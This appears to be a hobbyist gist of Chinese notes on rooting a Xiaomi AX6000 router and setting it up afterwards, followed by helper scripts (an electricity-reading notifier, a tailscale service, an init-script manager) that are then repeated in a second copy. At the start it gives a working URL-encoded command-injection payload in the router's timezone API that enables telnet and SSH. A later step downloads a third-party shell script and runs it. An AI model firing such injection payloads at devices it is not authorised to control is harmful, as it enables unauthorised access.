hrz6976/AX6000.md

## AX6000.md

      
    Raw
  

              AX6000.md
            
          
    RCE

AX6000在1.0.60前的版本存在任意命令执行漏洞。登录管理界面，将 STOK 替换为URL中的STOK (;stok=XXXYYY)。

设置Crash

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3B%20zz%3D%24%28dd%20if%3D%2Fdev%2Fzero%20bs%3D1%20count%3D2%202%3E%2Fdev%2Fnull%29%20%3B%20printf%20%27%A5%5A%25c%25c%27%20%24zz%20%24zz%20%7C%20mtd%20write%20-%20crash%20%3B%20

设置NVRam

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20set%20uart_en%3D1%20%3B%20bdata%20commit%20%3B%20

重启

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20
重启后可以通过Telnet登录路由器：
telnet 192.168.31.1

更改密码：
passwd root
nvram set ssh_en=1
nvram set telnet_en=1
nvram set uart_en=1
nvram set boot_wait=on
nvram commit
mtd erase crash
reboot
设置可写根目录

tee /data/mount-overlay.sh <<EOF
#!/bin/sh /etc/rc.common

START=00

. /lib/functions/preinit.sh

[ -e /data/overlay ] || mkdir /data/overlay
[ -e /data/overlay/upper ] || mkdir /data/overlay/upper
[ -e /data/overlay/work ] || mkdir /data/overlay/work

mount --bind /data/overlay /overlay
fopivot /overlay/upper /overlay/work /rom 1

#Fixup miwifi misc, and DO NOT use /overlay/upper/etc instead, /etc/uci-defaults/* may be already removed
/bin/mount -o noatime,move /rom/data /data 2>&-
/bin/mount -o noatime,move /rom/etc /etc 2>&-
/bin/mount -o noatime,move /rom/ini /ini 2>&-
/bin/mount -o noatime,move /rom/userdisk /userdisk 2>&-
EOF

chmod +x /data/mount-overlay.sh
uci set firewall.mount_overlay=include
uci set firewall.mount_overlay.type='script'
uci set firewall.mount_overlay.path='/data/mount-overlay.sh'
uci set firewall.mount_overlay.enabled='1'
uci commit
临时启动SSH

sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear
/etc/init.d/dropbear restart
固化SSH

mkdir /data/auto_ssh
cd /data/auto_ssh
curl -O https://fastly.jsdelivr.net/gh/lemoeo/AX6S@main/auto_ssh.sh
chmod +x auto_ssh.sh
sh auto_ssh.sh install
设置时区

uci set system.@system[0].timezone='CST-8'
uci set system.@system[0].webtimezone='CST-8'
uci set system.@system[0].timezoneindex='2.84'
uci commit
配置IPv6

uci set dhcp.lan.dhcpv6='relay'
uci set dhcp.lan.ra='relay'
uci set dhcp.lan.ndp='relay'
uci set dhcp.lan.leasetime='720m'
uci set dhcp.lan.ra_maxinterval='20'
uci set dhcp.wan.ignore='1'
uci set dhcp.wan_6=dhcp
uci set dhcp.wan_6.interface='wan'
uci set dhcp.wan_6.dhcpv6='relay'
uci set dhcp.wan_6.ra='relay'
uci set dhcp.wan_6.ndp='relay'
uci set dhcp.wan_6.master='1'
uci commit
设置定时脚本

0 9 * * * test -x /data/eletribot.sh && /data/eletribot.sh >/dev/null 2>&1
配置OPKG

tee /etc/opkg/distfeeds.conf <<EOF
src/gz openwrt_core http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/packages
src/gz openwrt_base http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/base
EOF

tee -a /etc/opkg.conf <<EOF
arch all 100
arch aarch64_cortex-a53 200
EOF

opkg update
安装Python

opkg install python3-pip

# openssl won't work out-of-the-box
cd /tmp
curl -O https://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/base/libopenssl_1.0.2u-1_aarch64_cortex-a53.ipk
tar zxpvf libopenssl_1.0.2u-1_aarch64_cortex-a53.ipk
tar -xvf data.tar.gz
cd ./usr/lib/
cp libcrypto.so.1.0.0 libssl.so.1.0.0 /usr/lib/

  
## electribot.sh
#!/bin/sh

### To run this script every day ###
# echo "9 0 * * * /path/to/electribot.sh" | crontab -e
####################################

# capture: http://www.cpcelc.pku.edu.cn/phone/socket.php?apistr=XXXXX
OPERID="oF_bbccddeeffeeddssaa"
# Reading Log
READING_LOG="/tmp/electribot.log"
LOW_THRESHOLD=20
# Serverchan sendkey https://sct.ftqq.com/
SCKEY="SCT88776655443322110099887766"

get_reading() {
    PAYLOAD_STR=$(printf 'apistr={"operType":"BGRJ2018_CXDBSY_BY","operFlag":300023,"OperID":"%s"}' "$OPERID")
    FLOAT_VAL=$(curl -Gs http://www.cpcelc.pku.edu.cn/phone/socket.php \
        --data-urlencode "$PAYLOAD_STR" \
        | grep -oE "([0-9]{1,3}\.)[0-9]{1,3}" \
        | head -n 1)
    if [ -z "$FLOAT_VAL" ]; then
        echo "Failed to get reading"
        exit 1
    fi
    printf "%.0f" "$FLOAT_VAL"
}

get_date() {
    # date representation in zh-CN
    date "+%Y-%m-%d %H:%M:%S"
}

send_sc_message() {
    if [ -z "$1" ] || [ -z "$2" ]; then
        echo "Missing message or title: message=$1 title=$2"
        return 1
    fi
    curl -Gs "https://sc.ftqq.com/$SCKEY.send" \
        -X POST \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        --data-urlencode "$(printf 'title=%s' "$1")" \
        --data-urlencode "$(printf 'desp=%s' "$2")"
}

READING=$(get_reading)
echo "Current reading: $READING"
echo "$(get_date) $READING" >> "$READING_LOG"
if [ -z "$READING" ]; then
    echo "Failed to get reading"
    exit 1
fi

TITLE=$(printf '电量剩余%s度' "$READING")
if [ -f "$READING_LOG" ]; then
    MESSAGE="最近三次读数："
    MESSAGE="$MESSAGE $(printf '%s\n' "$(tail -n 3 "$READING_LOG")")"
else
    touch "$READING_LOG"
    MESSAGE="没有近期记录"
fi

if [ "$READING" -lt "$LOW_THRESHOLD" ]; then
    TITLE="【尽快充电】$TITLE"
    MESSAGE="购电：http://www.cpcelc.pku.edu.cn/phone/mainpage.php
$MESSAGE"
fi

echo "$TITLE" "$MESSAGE"

## tailscaled
#!/bin/sh /etc/rc.common
# Copyright (C) 2009-2011 OpenWrt.org

START=90
USE_PROCD=1

# tailscale settings

PORT="41641"
ARCH="arm64"
VERSION="1.48.2"
FLAGS=""

download() {
    # Download tailscale
    curl -L -o /tmp/tailscale.tar.gz https://pkgs.tailscale.com/stable/tailscale_${VERSION}_${ARCH}.tgz
    tar -C /tmp -xzf /tmp/tailscale.tar.gz
    ln -s /tmp/tailscale_${VERSION}_${ARCH}/tailscaled /usr/sbin/tailscaled
    ln -s /tmp/tailscale_${VERSION}_${ARCH}/tailscale /usr/sbin/tailscale
    # remove archive
    rm /tmp/tailscale.tar.gz
}

start_service() {
    [ -f /usr/sbin/tailscaled ] || download
    procd_open_instance
    procd_set_param command /usr/sbin/tailscaled --state=/data/etc/tailscaled.state --port=${PORT} ${FLAGS}
    procd_set_param stdout 1
    procd_set_param stderr 1
    procd_close_instance
}

stop_service() {
    /usr/sbin/tailscaled --cleanup
}

## zinit.sh
#!/bin/sh

BASE_DIR=/data/etc/init.d

set -e

remove_firewall_script(){
    # if the service not exists
    if [ -z $(uci -q get firewall.${1}) ]; then
        # exit
        return
    fi
    echo "remove firewall.${1}"
    # remove the service
    uci delete firewall.${1}
}

add_firewall_script(){
    if [ ! -f ${2} ]; then
        echo "file ${2} not exists"
        return
    fi

    # if the service exists
    if [ ! -z $(uci -q get firewall.${1}) ]; then
        echo "firewall.${1} already exists"
        # exit
        return
    fi
    echo "add firewall.${1} ${2}"
    # add the service
    uci set firewall.${1}=include
    uci set firewall.${1}.type=script
    uci set firewall.${1}.path="${2}"
    uci set firewall.${1}.enabled=1

    # commit the changes
    uci commit firewall
}

remove_init_script(){
    # if the service not exists
    if [ ! -f /etc/init.d/${1} ]; then
        # exit
        echo "service ${1} not exists"
        return
    fi
    echo "remove /etc/init.d/${1}"
    # disable the service
    /etc/init.d/${1} disable
    # stop the service
    /etc/init.d/${1} stop
    # remove the service
    rm /etc/init.d/${1}
}

add_init_script(){
    if [ ! -f ${2} ]; then
        echo "file ${2} not exists"
        return
    fi

    # if the service exists
    if [ -f /etc/init.d/${1} ]; then
        echo "service ${1} already exists"
        # exit
        return
    fi
    echo "add /etc/init.d/${1} ${2}"
    # add the service
    ln -sf ${2} /etc/init.d/${1}
    # chmod
    chmod +x /etc/init.d/${1}
    # enable the service
    /etc/init.d/${1} enable
    # start the service
    /etc/init.d/${1} start
}

FLAG_ALL=0
FLAG_REMOVE=0

if [ $# -eq 0 ]; then
    FLAG_ALL=1
elif [ $# -eq 1 ] && [ $1 = "--remove" ]; then
    FLAG_ALL=1
    FLAG_REMOVE=1
elif [ $# -eq 2 ] && [ $1 = "--remove" ]; then
    FLAG_REMOVE=1
fi

if [ $FLAG_ALL -eq 0 ]; then
    NAME=$(basename "$1" | cut -d. -f1)
    FULL_PATH=$(readlink -f "$1")
    if [ $FLAG_REMOVE -eq 1 ]; then
        remove_init_script ${NAME}
    else
        add_init_script ${NAME} ${FULL_PATH}
    fi
else
    # init job

    # add itself to init script
    NAME="zinit"
    FULL_PATH=$(readlink -f "$0")
    add_firewall_script ${NAME} ${FULL_PATH}

    # list dir
    for FILE in $(ls $BASE_DIR/*); do
        # chmod all
        chmod -R +x "$FILE"
        NAME=$(basename "$FILE")
        FULL_PATH=$(readlink -f "$FILE")
        if [ $FLAG_REMOVE -eq 1 ]; then
            remove_init_script ${NAME}
        else
            add_init_script ${NAME} ${FULL_PATH}
        fi
    done

fi
	#!/bin/sh

	### To run this script every day ###
	# echo "9 0 * * * /path/to/electribot.sh" \| crontab -e
	####################################

	# capture: http://www.cpcelc.pku.edu.cn/phone/socket.php?apistr=XXXXX
	OPERID="oF_bbccddeeffeeddssaa"
	# Reading Log
	READING_LOG="/tmp/electribot.log"
	LOW_THRESHOLD=20
	# Serverchan sendkey https://sct.ftqq.com/
	SCKEY="SCT88776655443322110099887766"

	get_reading() {
	PAYLOAD_STR=$(printf 'apistr={"operType":"BGRJ2018_CXDBSY_BY","operFlag":300023,"OperID":"%s"}' "$OPERID")
	FLOAT_VAL=$(curl -Gs http://www.cpcelc.pku.edu.cn/phone/socket.php \
	--data-urlencode "$PAYLOAD_STR" \
	\| grep -oE "([0-9]{1,3}\.)[0-9]{1,3}" \
	\| head -n 1)
	if [ -z "$FLOAT_VAL" ]; then
	echo "Failed to get reading"
	exit 1
	fi
	printf "%.0f" "$FLOAT_VAL"
	}

	get_date() {
	# date representation in zh-CN
	date "+%Y-%m-%d %H:%M:%S"
	}

	send_sc_message() {
	if [ -z "$1" ] \|\| [ -z "$2" ]; then
	echo "Missing message or title: message=$1 title=$2"
	return 1
	fi
	curl -Gs "https://sc.ftqq.com/$SCKEY.send" \
	-X POST \
	-H 'Content-Type: application/x-www-form-urlencoded' \
	--data-urlencode "$(printf 'title=%s' "$1")" \
	--data-urlencode "$(printf 'desp=%s' "$2")"
	}

	READING=$(get_reading)
	echo "Current reading: $READING"
	echo "$(get_date) $READING" >> "$READING_LOG"
	if [ -z "$READING" ]; then
	echo "Failed to get reading"
	exit 1
	fi

	TITLE=$(printf '电量剩余%s度' "$READING")
	if [ -f "$READING_LOG" ]; then
	MESSAGE="最近三次读数："
	MESSAGE="$MESSAGE $(printf '%s\n' "$(tail -n 3 "$READING_LOG")")"
	else
	touch "$READING_LOG"
	MESSAGE="没有近期记录"
	fi

	if [ "$READING" -lt "$LOW_THRESHOLD" ]; then
	TITLE="【尽快充电】$TITLE"
	MESSAGE="购电：http://www.cpcelc.pku.edu.cn/phone/mainpage.php
	$MESSAGE"
	fi

	echo "$TITLE" "$MESSAGE"
	#!/bin/sh /etc/rc.common
	# Copyright (C) 2009-2011 OpenWrt.org

	START=90
	USE_PROCD=1

	# tailscale settings

	PORT="41641"
	ARCH="arm64"
	VERSION="1.48.2"
	FLAGS=""

	download() {
	# Download tailscale
	curl -L -o /tmp/tailscale.tar.gz https://pkgs.tailscale.com/stable/tailscale_${VERSION}_${ARCH}.tgz
	tar -C /tmp -xzf /tmp/tailscale.tar.gz
	ln -s /tmp/tailscale_${VERSION}_${ARCH}/tailscaled /usr/sbin/tailscaled
	ln -s /tmp/tailscale_${VERSION}_${ARCH}/tailscale /usr/sbin/tailscale
	# remove archive
	rm /tmp/tailscale.tar.gz
	}

	start_service() {
	[ -f /usr/sbin/tailscaled ] \|\| download
	procd_open_instance
	procd_set_param command /usr/sbin/tailscaled --state=/data/etc/tailscaled.state --port=${PORT} ${FLAGS}
	procd_set_param stdout 1
	procd_set_param stderr 1
	procd_close_instance
	}

	stop_service() {
	/usr/sbin/tailscaled --cleanup
	}
	#!/bin/sh

	BASE_DIR=/data/etc/init.d

	set -e

	remove_firewall_script(){
	# if the service not exists
	if [ -z $(uci -q get firewall.${1}) ]; then
	# exit
	return
	fi
	echo "remove firewall.${1}"
	# remove the service
	uci delete firewall.${1}
	}

	add_firewall_script(){
	if [ ! -f ${2} ]; then
	echo "file ${2} not exists"
	return
	fi

	# if the service exists
	if [ ! -z $(uci -q get firewall.${1}) ]; then
	echo "firewall.${1} already exists"
	# exit
	return
	fi
	echo "add firewall.${1} ${2}"
	# add the service
	uci set firewall.${1}=include
	uci set firewall.${1}.type=script
	uci set firewall.${1}.path="${2}"
	uci set firewall.${1}.enabled=1

	# commit the changes
	uci commit firewall
	}

	remove_init_script(){
	# if the service not exists
	if [ ! -f /etc/init.d/${1} ]; then
	# exit
	echo "service ${1} not exists"
	return
	fi
	echo "remove /etc/init.d/${1}"
	# disable the service
	/etc/init.d/${1} disable
	# stop the service
	/etc/init.d/${1} stop
	# remove the service
	rm /etc/init.d/${1}
	}

	add_init_script(){
	if [ ! -f ${2} ]; then
	echo "file ${2} not exists"
	return
	fi

	# if the service exists
	if [ -f /etc/init.d/${1} ]; then
	echo "service ${1} already exists"
	# exit
	return
	fi
	echo "add /etc/init.d/${1} ${2}"
	# add the service
	ln -sf ${2} /etc/init.d/${1}
	# chmod
	chmod +x /etc/init.d/${1}
	# enable the service
	/etc/init.d/${1} enable
	# start the service
	/etc/init.d/${1} start
	}

	FLAG_ALL=0
	FLAG_REMOVE=0

	if [ $# -eq 0 ]; then
	FLAG_ALL=1
	elif [ $# -eq 1 ] && [ $1 = "--remove" ]; then
	FLAG_ALL=1
	FLAG_REMOVE=1
	elif [ $# -eq 2 ] && [ $1 = "--remove" ]; then
	FLAG_REMOVE=1
	fi

	if [ $FLAG_ALL -eq 0 ]; then
	NAME=$(basename "$1" \| cut -d. -f1)
	FULL_PATH=$(readlink -f "$1")
	if [ $FLAG_REMOVE -eq 1 ]; then
	remove_init_script ${NAME}
	else
	add_init_script ${NAME} ${FULL_PATH}
	fi
	else
	# init job

	# add itself to init script
	NAME="zinit"
	FULL_PATH=$(readlink -f "$0")
	add_firewall_script ${NAME} ${FULL_PATH}

	# list dir
	for FILE in $(ls $BASE_DIR/*); do
	# chmod all
	chmod -R +x "$FILE"
	NAME=$(basename "$FILE")
	FULL_PATH=$(readlink -f "$FILE")
	if [ $FLAG_REMOVE -eq 1 ]; then
	remove_init_script ${NAME}
	else
	add_init_script ${NAME} ${FULL_PATH}
	fi
	done

	fi